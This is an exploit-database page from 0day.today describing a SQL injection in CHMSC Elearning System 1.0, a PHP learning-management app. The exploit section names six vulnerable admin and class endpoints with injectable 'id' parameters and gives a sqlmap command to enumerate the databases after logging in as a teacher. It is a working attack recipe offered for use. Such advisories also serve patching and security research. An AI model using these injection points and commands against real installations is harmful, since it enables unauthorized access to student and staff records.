[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CHMSC Elearning System 1.0 SQL Injection Vulnerability

Author
Ferhat Cil
Risk
[
Security Risk High
]
0day-ID
0day-ID-35577
Category
web applications
Date add
30-12-2020
Platform
php
# Exploit Title: CHMSC Elearning System 1.0 - SQL Injection
# Exploit Author: Ferhat Çil
# Vendor Homepage:
https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html
# Software Link:
https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version : Version 1
# Tested on Ubuntu

Step 1. Log in to the application with teacher credentials.

Url addresses with sqli
- http://localhost/<folder>/class.php?id=7
- http://localhost/<folder>/admin/edit_teacher.php?id=1
- http://localhost/<folder>/admin/add_student.php?id=17
- http://localhost/<folder>/admin/add_course.php?id=5
- http://localhost/<folder>/admin/add_subject.php?id=5
- http://localhost/<folder>/admin/add_department.php?id=6

Step 2. Run sqlmap on the URL where the "id" parameter is given

sqlmap -r requestData.txt --dbs

#  0day.today [2024-12-26]  #